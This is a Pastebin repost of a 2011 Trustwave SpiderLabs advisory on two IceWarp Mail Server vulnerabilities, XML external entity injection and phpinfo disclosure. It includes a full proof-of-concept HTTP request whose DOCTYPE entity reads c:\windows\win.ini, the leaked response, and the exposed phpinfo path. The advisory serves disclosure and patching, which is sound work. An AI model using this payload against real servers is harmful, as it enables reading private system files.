Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Published: 2011-09-23
- Version: 1.0
- Vendor: IceWarp (http://www.icewarp.com)
- Product: IceWarp Mail Server
- Version affected: 10.3.2 and below
- Product description: IceWarp WebMail is the web front-end for the IceWarp
- Mail Server, which provides email access on over 50,000 servers. IceWarp
- WebMail provides web-based access to email, calendars, contacts, files
- and shared data from any computer with a browser and Internet connection.
- Credit: David Kirkpatrick of Trustwave's SpiderLabs
- Finding 1: XML External Entity Injection
- CVE: CVE-2011-3579
- An external entity is a function of the XML specification which allows XML
- documents to reference resources external to the XML document. This
- functionality forces the XML parser of the application to access the
- resource specified.
- In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to
- access local files on the operating system where the IceWarp server is
- installed. Using this technique it is possible to retrieve readable files
- on the operating system. This attack can also be used to create a possible
- denial of service condition.
- Proof-of-Concept:
- The following POST request was sent to the host A.B.C.D where the IceWarp
- mail server was running:
- REQUEST
- =========
- POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
- Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)
- Gecko/20100101 Firefox/5.0
- Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language:en-gb,en;q=0.5i've
- Accept-Encoding: gzip, deflate
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Proxy-Connection: keep-alive
- Referer: http://A.B.C.D
- Content-Length: 249
- Content-Type: application/xml;charset=UTF-8
- Pragma: no-cache
- Cache-Control: no-cache
- <!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
- type="set"><query
- xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c
- 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc
- d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><
- /query></iq>
- RESPONSE:
- ==========
- HTTP/1.1 200 OK
- Server: IceWarp/9.4.2
- Date: Wed, 20 Jul 2011 10:04:56 GMT
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control:no-store, no-cache, must-revalidate, post-check=0,
- pre-check=0 Pragma: no-cache
- Content-Type: text/xml
- Vary: Accept-Encoding
- Content-Length: 1113
- <?xml version="1.0" encoding="utf-8"?><iq type="error"><error
- uid="login_invalid">test; for 16-bit app support
- [fonts]
- [extensions]
- [mci extensions]
- [files]
- [Mail]
- MAPI=1
- ....TRUNCATED
- The above proof-of-concept would retrieve the c:\windows\win.ini file (the
- response in this example has been truncated).
- Finding 2: PHP Information Disclosure
- CVE: CVE-2011-3580
- It is possible to retrieve the PHP information file phpinfo() by accessing
- the following URL http://A.B.C.D/server where A.B.C.D is the IP of the
- server running the IceWarp software. The response will be a page detailing
- the PHP version used and the configuration settings of PHP, including
- system details.
- Vendor Response: These issues have been addressed as of version 10.3.3
- Remediation Steps: Customers should update to the latest version of IceWarp
- Mail Server in order to address these issues. The above issues have been
- corrected in version 10.3.3.
- Revision History:
- 08/03/11 - Vulnerability disclosed
- 09/19/11 - Patch released
- 09/23/11 - Advisory published
- About Trustwave: Trustwave is the leading provider of on-demand and
- subscription-based information security and payment card industry
- compliance management solutions to businesses and government entities
- throughout the world. For organizations faced with today's challenging
- data security and compliance environment, Trustwave provides a unique
- approach with comprehensive solutions that include its flagship
- TrustKeeper compliance management software and other proprietary security
- solutions. Trustwave has helped thousands of organizations--ranging from
- Fortune 500 businesses and large financial institutions to small and
- medium-sized retailers--manage compliance and secure their network
- infrastructure, data communications and critical information assets.
- Trustwave is headquartered in Chicago with offices throughout North
- America, South America, Europe, Africa, China and Australia.
- About Trustwave's SpiderLabs: SpiderLabs is the advance security team at
- Trustwave responsible for incident response and forensics, ethical hacking
- and application security tests for Trustwave's clients. SpiderLabs has
- responded to hundreds of security incidents, performed thousands of ethical
- hacking exercises and tested the security of hundreds of business
- applications for Fortune 500 organizations. For more information visit
- https://www.trustwave.com/spiderlabs
- Disclaimer: The information provided in this advisory is provided "as is"
- without warranty of any kind. Trustwave disclaims all warranties, either
- express or implied, including the warranties of merchantability and fitness
- for a particular purpose. In no event shall Trustwave or its suppliers be
- liable for any damages whatsoever including direct, indirect, incidental,
- consequential, loss of business profits or special damages, even if
- Trustwave or its suppliers have been advised of the possibility of such
- damages. Some states do not allow the exclusion or limitation of liability
- for consequential or incidental damages so the foregoing limitation may not
- apply.
- This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
- //////////////////////////////////////////////////////////////////////////////////////////::
- WEB: http://h4ck3r.ze-forum.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement